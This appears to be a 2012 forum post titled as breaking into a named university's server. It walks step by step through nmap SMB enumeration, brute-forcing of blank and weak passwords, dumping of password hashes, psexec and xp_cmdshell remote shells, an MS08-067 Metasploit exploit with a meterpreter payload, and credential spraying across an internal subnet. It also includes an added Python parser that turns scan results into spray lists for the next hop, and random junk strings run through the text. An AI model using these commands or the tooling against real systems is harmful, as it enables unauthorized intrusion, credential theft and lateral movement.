Breaking into Guangxi Normal with nmap + msf

Posted on 2012-12-4 12:46:42

Target: the Guangxi Normal website, http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

// Windows 2000 with SMB (139/445), RPC and Terminal Services exposed. Note that nmap only prints a MAC Address line for a target on the same Ethernet segment, and the 08:00:27 prefix (listed as Cadmus Computer Systems) is the VirtualBox OUI, so despite the public address the scans in this post ran against a VM on the local network.
' b0 N# C, Z5 r$ ~- i
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb     // list the SMB scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
8 Y# ^/ c& L$ x* l" |( h: X
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser     // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

// Without -sV the SERVICE column is only nmap's port-name table (NFS-or-IIS, LSA-or-nterm), not a fingerprint; the version scan above is the one to trust for what is actually listening.
% I2 c2 J# E7 V9 A4 r' V* U$ Q0 L
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

// Anonymous READ on IPC$ is the null session the enumeration above depends on; the administrative shares themselves need credentials.
! F4 o) q3 u  P* k1 g$ K
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
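The three script runs above print their findings in nmap's normal output format, and every later step on this page is driven by reading those lines by eye. The parser below is an added example written for this editorial pass, not code from the original post or from the nmap project: it pulls the open ports, the smb-enum-users account list, the smb-enum-shares anonymous-access table and the smb-brute logins out of that format so the next step can consume them. The embedded report is constructed from the lines shown above (merged as one run would print them), and the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed sample: the port table plus the three host-script results
# printed on this page, merged into one report as a single run would print them.
NMAP_SAMPLE = """\
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
SCRIPT_RE = re.compile(r"^(smb[\w-]*):\s*$")
USERS_RE = re.compile(r"Users:\s*(.+)")
ANON_RE = re.compile(r"Anonymous access:\s*(\S+)")
LOGIN_RE = re.compile(r"^(\S+):(\S+) => Login was successful")


def parse_nmap_smb(text: str) -> List[dict]:
    """One dict per host: ip, open ports, SMB users, share access, working logins."""
    hosts: List[dict] = []
    cur = None      # host currently being filled in
    script = None   # NSE script whose output we are inside
    share = None    # share name waiting for its "Anonymous access" line
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            cur = {"ip": m.group(1), "ports": {}, "users": [], "shares": {}, "creds": []}
            hosts.append(cur)
            script = share = None
            continue
        if cur is None:
            continue
        m = PORT_RE.match(raw)
        if m:
            if m.group(3) == "open":
                cur["ports"][int(m.group(1))] = m.group(4)
            continue
        if not raw.startswith("|"):
            continue
        # NSE lines look like "| name:", "|   body" and "|_  last line"; drop the margin.
        body = raw.lstrip("|_").strip()
        m = SCRIPT_RE.match(body)
        if m:
            script, share = m.group(1), None
        elif script == "smb-enum-users":
            m = USERS_RE.search(body)
            if m:
                cur["users"] = [u.strip() for u in m.group(1).split(",")]
        elif script == "smb-enum-shares":
            m = ANON_RE.search(body)
            if m and share:
                cur["shares"][share] = m.group(1)
            elif body and ":" not in body:
                share = body
        elif script == "smb-brute":
            m = LOGIN_RE.match(body)
            if m:
                cur["creds"].append((m.group(1), "" if m.group(2) == "<blank>" else m.group(2)))
    return hosts


def spray_lists(hosts: List[dict]) -> Tuple[List[str], List[str]]:
    """Usernames and passwords to reuse against the rest of the network, in the
    order a userdb/passdb would list them: confirmed logins first, then every
    enumerated account, with duplicates removed case-insensitively."""
    users: List[str] = []
    passwords: List[str] = []
    seen = set()
    for h in hosts:
        for u, p in h["creds"] + [(name, None) for name in h["users"]]:
            if u.lower() not in seen:
                seen.add(u.lower())
                users.append(u)
            if p is not None and p not in passwords:
                passwords.append(p)
    return users, passwords
```

The parser keys on the `|` margin that NSE uses for host script results, so it also works on the reports nmap prints for a whole range, one host at a time; feed it the output of the later `192.168.1.1-254` sweep and `spray_lists` gives the userdb/passdb contents for the next hop.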
( O4 C% ?9 T- ^# m4 q$ o4 V9 s  o
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2     // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
// smb-pwdump.nse is an experimental script from nmap-exp; it needs the pwdump6 binaries unpacked into nselib/data and a working account on the target

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\Desktop>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe     // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\Desktop\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"     // log in remotely as sa and run a command through xp_cmdshell
# e- i$ f7 t5 M
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241     // check the target for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
& g2 J- ]' q9 R7 _4 c9 p; Q0 N( ]
root@bt:~# msfconsole     // use msf to exploit MS08-067 against the target

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames and the captured hash against the whole internal /24

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

// The only hit is the blank administrator password; whether the 32-hex-digit passdb entry was tried as a hash or as a literal password cannot be told from this output (nmap's smb library takes hashes explicitly through the smbhash script-arg).

Attack successful: a simple msf + nmap attack.
- u. X$ \, ]5 s8 g$ z) K# I# \) U; U( m. C! z